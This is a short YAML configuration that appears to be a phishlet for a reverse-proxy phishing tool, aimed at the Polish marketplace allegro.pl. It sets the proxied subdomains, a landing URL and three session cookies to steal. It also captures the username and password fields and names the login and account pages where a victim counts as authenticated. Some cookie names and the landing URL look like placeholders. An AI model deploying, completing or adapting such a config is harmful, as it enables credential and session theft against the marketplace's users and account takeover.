creator: '@hash3liZer'
name: 'allegro'
proto: 'http'
landing: 'www.allegro.url/comeon'

subdomains:
  - {substitution: '', original: '', domain: 'allegro.pl'}
  - {substitution: 'www', original: 'www', domain: 'allegro.pl'}

substitutions:
  - {host: 'www.allegro.pl', search: '', replace: '', content: ''}

cookies:
  - 'poler'
  - 'domre'
  - 'coler'

captures:
  - {name: 'username', type: 'post'}
  - {name: 'password', type: 'get'}

authentication:
  - '/login/form/'
  - '/moje-allegro/moje-konto'
